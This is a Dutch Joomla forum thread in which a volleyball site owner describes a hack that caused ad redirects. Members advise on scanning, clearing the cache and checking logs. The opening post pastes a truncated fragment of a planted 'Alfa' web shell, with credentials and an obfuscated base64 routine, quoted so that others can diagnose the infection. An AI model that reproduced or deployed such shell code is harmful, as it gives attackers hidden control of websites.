Skip to main content

Vraag Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...

  • nkamp
  • nkamp's Profielfoto Onderwerp Auteur
  • Offline
  • Premium lid
  • Premium lid
Meer
6 jaren 5 maanden geleden #16250 door nkamp
Hallo,

Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de volleybalsitevolleybalsite ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:
  • contacts.php
  • pagenews.php
  • userloader.php

De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:
Code:
<?php $GLOBALS['Alfa_User'] = 'admin'; $GLOBALS['Alfa_Pass'] = '8a4bf282852bf4c49e17f0951f645e72'; $GLOBALS['Alfa_Protect_Shell'] = '1'; $GLOBALS['Alfa_Login_Page'] = '404'; $GLOBALS['Alfa_Show_Icons'] = '1'; if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEF

De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?

Ik heb de site afgelopen week naar 3.8.1 gebracht.

Bedankt,

Nico
Onderwerp is gesloten.
  • Leen
  • Leen's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Geen zorgen voor de dag van morgen
Meer
6 jaren 5 maanden geleden #16252 door Leen
Hallo Nico,

Die 3 bestanden in je root weet niet waar ze vandaan komen normaal staan ze daar niet .
Maar als je een akeeba back-up heb terug gezet maak je van te voren dan wel goed die map leeg.
En nadien goed eerst alle modules en extensies en plug-in controleren op Updates
voor je weer echt gaat Update naar nieuwe versie

M.v.g Leen
Bijlagen:
Onderwerp is gesloten.
  • Leen
  • Leen's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Geen zorgen voor de dag van morgen
Meer
6 jaren 5 maanden geleden #16253 door Leen
Heb nog even je site laten scannen bij sucuri scan
en zo te zien heb je iets opgelopen

M.v.g Leen
Bijlagen:
De volgende gebruiker (s) zei dank u: nkamp
Onderwerp is gesloten.
  • nkamp
  • nkamp's Profielfoto Onderwerp Auteur
  • Offline
  • Premium lid
  • Premium lid
Meer
6 jaren 5 maanden geleden #16257 door nkamp
Hallo,

Aan die sucuri had ik weer even niet gedacht, bedankt!

Maar ik heb het volgens mij gevonden, het zat in de index.php van de template (shape5). Ik heb het daar uitgehaald. Ik heb nu alle files door gescanned op wat sucuri aangeeft, ik heb de database doorzocht door de dump te doorzoeken op de tekens die sucuri aan geeft, niets meer gevonden of kunnen vinden!

Maar sucuri geeft nog steeds dat het wat vindt? Ook als ik view source in de browser doe, kan ik wat sucuri aan geeft, niet vinden.

Hoe kom ik er nu achter of de site nu wel of niet schoon is?

Gr.,

Nico
Onderwerp is gesloten.
Meer
6 jaren 5 maanden geleden #16258 door Ron
Misschien je cache van je site even opschonen.

En dan nogmaals scan uitvoeren!

Groeten Ron

Bent u opzoek naar een een Hotel in Sauerland voor uw motor, Fiets en wandelvakantie dan zit u bij Hotel Landgasthof Grevenstein op het juiste adres!
Handelsregister-Nr: HRA6354 Amtsgericht: Arnsberg
Onderwerp is gesloten.
  • Otto
  • Otto's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Er bestaan geen domme vragen
Meer
6 jaren 5 maanden geleden #16259 door Otto
Hoi Nico,

Vergeet niet je Apache logs door te spitten en te onderzoeken hoe men binnen gekomen is.
- Via een besmette pc?
- Een kwetsbare extensie?
- het te laat updaten van Joomla
- Verkeerd toegewezen rechten aan mappen en bestanden

Op deze manier doe je namelijk alleen maar aan symptoombestrijding.

Artenweb.nl creatieve unieke Joomla en VirtueMart websites!
Vragen allen via dit Forum!
KvK: 61932647 - Voor onderscheidende Joomla sites die werken!
Onderwerp is gesloten.
Tijd voor maken pagina: 0.463 seconden
Gemaakt door Kunena